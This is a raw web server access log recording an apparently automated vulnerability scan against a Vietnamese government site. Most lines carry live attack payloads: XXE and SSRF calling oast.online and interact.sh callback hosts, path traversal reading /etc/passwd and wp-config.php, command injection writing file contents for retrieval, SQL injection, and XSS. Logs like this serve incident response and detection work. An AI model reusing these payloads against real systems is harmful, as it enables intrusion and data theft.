2023-10-13 05:34:55 103.153.214.94 GET /xmlpserver/convert xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//ckjv7uic8b6p3donsoog46oh4tsgqtxgd.oast.online/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201
2023-10-13 05:35:13 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 199
2023-10-13 05:35:16 103.153.214.94 POST /_async/AsyncResponseService - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 198
2023-10-13 05:35:18 103.153.214.94 GET /_async/favicon.ico - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 202
2023-10-13 05:35:48 103.153.214.94 POST /rest/tinymce/1/macro/preview - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 bcvt.kontum.gov.vn 405 0 1 200
2023-10-13 05:37:49 103.153.214.94 GET /secure/ManageFilters.jspa filter=popular&filterView=popular 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 204
2023-10-13 05:38:51 103.153.214.94 GET /secure/ConfigurePortalPages!default.jspa view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201
2023-10-13 05:40:01 103.153.214.94 GET /rest/api/2/user/picker query 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207
2023-10-13 05:41:17 103.153.214.94 GET /test/pathtraversal/master/..%2f..%2f..%2f..%2f../etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 0 222
2023-10-13 05:42:36 103.153.214.94 GET /__r2/query-printRows.view schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 202
2023-10-13 05:43:25 103.153.214.94 GET /labkey/__r1/login-login.view returnUrl=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199
2023-10-13 05:44:51 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 203
2023-10-13 05:47:54 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gaWtvc2oudHh0YA===&format=png 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201
2023-10-13 05:47:57 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gaWtvc2oudHh0YA===&format=jpg 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 198
2023-10-13 05:48:00 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gaWtvc2oudHh0YA===&format=jpg 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 580
2023-10-13 05:48:01 103.153.214.94 GET /objects/ikosj.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 197
2023-10-13 05:48:16 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 406 0 0 212
2023-10-13 05:50:30 103.153.214.94 GET /sell-media-search/ keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206
2023-10-13 05:51:08 103.153.214.94 POST /adxmlrpc.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 816
2023-10-13 05:51:10 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 199
2023-10-13 05:51:23 103.153.214.94 POST /node/1 _format=hal_json 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 198
2023-10-13 05:52:11 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 202
2023-10-13 05:56:06 103.153.214.94 GET /index.php pma_servername=ckjv7uic8b6p3donsoog5f1taxnxmfxih.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206
2023-10-13 05:56:08 103.153.214.94 GET /pma/index.php pma_servername=ckjv7uic8b6p3donsoogk795jhh5umknx.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 201
2023-10-13 05:56:09 103.153.214.94 GET /pmd/index.php pma_servername=ckjv7uic8b6p3donsoog6q5e7h98h3cws.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 198
2023-10-13 05:56:11 103.153.214.94 GET /phpMyAdmin/index.php pma_servername=ckjv7uic8b6p3donsoogqwat7qqhh3nte.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 198
2023-10-13 05:56:14 103.153.214.94 GET /phpmyadmin/index.php pma_servername=ckjv7uic8b6p3donsoog5cd76c6niwsxx.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 198
2023-10-13 05:56:15 103.153.214.94 GET /_phpmyadmin/index.php pma_servername=ckjv7uic8b6p3donsoog98jdbz9go7wc8.oast.online&pma_username=2WfF0gH1eqBjZB42yzNza6hmhaS&pma_password=2WfF0gH1eqBjZB42yzNza6hmhaS&server=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 199
2023-10-13 05:56:22 103.153.214.94 POST /photo/p/api/album.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 199
2023-10-13 05:56:51 103.153.214.94 GET /webapp/ fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 199
2023-10-13 05:57:29 103.153.214.94 POST /service/extdirect - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 206
2023-10-13 05:59:06 103.153.214.94 GET / c=../../../../../../etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206
2023-10-13 05:59:08 103.153.214.94 GET /badging/badge_print_v0.php tpl=../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 198
2023-10-13 05:59:18 103.153.214.94 GET /badging/badge_template_v0.php layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 06:00:59 103.153.214.94 GET /-/media/doo-doo.ashx - 443 - 192.46.208.206 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 215
2023-10-13 06:01:48 103.153.214.94 GET /updating.jsp url=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 563
2023-10-13 06:02:00 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20gVdZIAMCAl.txt%60 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203
2023-10-13 06:02:02 103.153.214.94 GET /gVdZIAMCAl.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 198
2023-10-13 06:03:01 103.153.214.94 POST /cgi-bin/supportInstaller - 443 - 193.123.37.162 MSIE - 405 0 1 203
2023-10-13 06:05:12 103.153.214.94 POST /kindeditor/php/demo.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 820
2023-10-13 06:05:13 103.153.214.94 POST /php/demo.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 197
2023-10-13 06:07:21 103.153.214.94 POST /api/timelion/run - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 0 2 214
2023-10-13 06:09:40 103.153.214.94 GET /index.php/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 06:10:00 103.153.214.94 POST /content/2WfF0eiLQ6qll5GHZVy4TjBFRnF - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 199
2023-10-13 06:10:01 103.153.214.94 POST /content/2WfF0eiLQ6qll5GHZVy4TjBFRnF.af.internalsubmit.json - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 198
2023-10-13 06:10:17 103.153.214.94 GET /s/2WfF0ZS4cdc3TaZGnZC4zETQkRM/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 202
2023-10-13 06:10:19 103.153.214.94 GET /s/2WfF0ZS4cdc3TaZGnZC4zETQkRM/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 06:10:48 103.153.214.94 POST /rest/issueNav/1/issueTable - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 201
2023-10-13 06:10:59 103.153.214.94 GET /rest/api/latest/groupuserpicker query=1&maxResults=50000&showAvatar=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 06:13:21 103.153.214.94 POST /plugins/servlet/gadgets/makeRequest - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 202
2023-10-13 06:16:47 103.153.214.94 GET /hoteldruid/visualizza_tabelle.php anno=2019&id_sessione&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 203
2023-10-13 06:17:49 103.153.214.94 GET /wavemaker/studioService.download method=getContent&inUrl=file///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 201
2023-10-13 06:18:26 103.153.214.94 POST /search/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 204
2023-10-13 06:20:49 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201
2023-10-13 06:20:58 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 199
2023-10-13 06:23:01 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 https://bcvt.kontum.gov.vn/artifactory/webapp/ 405 0 1 199
2023-10-13 06:28:34 103.153.214.94 GET /index.php/component/jemessenger/box_details task=download&dw_file=../../.././../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 202
2023-10-13 06:30:17 103.153.214.94 GET / mp_idx=%22;alert(%271%27);// 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 210
2023-10-13 06:30:25 103.153.214.94 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://ckjv7uic8b6p3donsooghbjg478hq8ktc.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 200
2023-10-13 06:32:57 103.153.214.94 GET /ReportServer/Pages/ReportViewer.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 203
2023-10-13 06:34:11 103.153.214.94 GET /web.config.i18n.ashx l=zbnoi&v=zbnoi 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202
2023-10-13 06:34:14 103.153.214.94 GET /SWNetPerfMon.db.i18n.ashx l=zbnoi&v=zbnoi 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 198
2023-10-13 06:35:05 103.153.214.94 GET /compliancepolicies.inc.php search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 204
2023-10-13 06:35:28 103.153.214.94 GET /compliancepolicyelements.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 202
2023-10-13 06:35:48 103.153.214.94 POST /service/rapture/session - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 202
2023-10-13 06:35:50 103.153.214.94 POST /service/rest/beta/repositories/bower/group - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 199
2023-10-13 06:36:07 103.153.214.94 GET /devices.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 199
2023-10-13 06:37:35 103.153.214.94 GET /auth/realms/master/protocol/openid-connect/auth scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ckjv7uic8b6p3donsoogeifondn8z6dpf.oast.online/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206
2023-10-13 06:37:37 103.153.214.94 GET /snippets.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 198
2023-10-13 06:38:28 103.153.214.94 GET /backupsettings.dat - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 06:40:26 103.153.214.94 POST /api/snapshots - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 212
2023-10-13 06:40:47 103.153.214.94 GET /index.php redirect=/\/interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201
2023-10-13 06:40:49 103.153.214.94 GET /index.php redirect=//interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200
2023-10-13 06:40:51 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 199
2023-10-13 06:40:54 103.153.214.94 GET /index.php/admin/filemanager/sa/getZipFile path=/../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 199
2023-10-13 06:42:10 103.153.214.94 GET /%2f%5cinteract.sh%2fa%3fb/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 11 0 201
2023-10-13 06:42:38 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201
2023-10-13 06:47:20 103.153.214.94 POST /mailingupgrade.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 204
2023-10-13 06:49:00 103.153.214.94 GET /public/login.htm type=probes 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 06:49:02 103.153.214.94 GET /public/login.htm type=requests 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 201
2023-10-13 06:49:04 103.153.214.94 GET /public/login.htm type=treestat 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 197
2023-10-13 06:49:09 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203
2023-10-13 06:49:11 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&file=%2F..%2Fwp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199
2023-10-13 06:49:34 103.153.214.94 GET /ucmdb-api/connect - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 210
2023-10-13 06:50:03 103.153.214.94 GET /does_not_exist""><script>alert(document.domain)</script><img+src=x - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 199
2023-10-13 06:53:01 103.153.214.94 GET /api/experimental/test - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 2 467
2023-10-13 06:53:02 103.153.214.94 GET /api/experimental/dags/example_trigger_target_dag/paused/false - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 207
2023-10-13 06:53:04 103.153.214.94 POST /api/experimental/dags/example_trigger_target_dag/dag_runs - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 217
2023-10-13 06:53:57 103.153.214.94 POST /v2/api/product/manger/getInfo - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 202
2023-10-13 06:54:24 103.153.214.94 GET / s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
2023-10-13 06:55:21 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 207
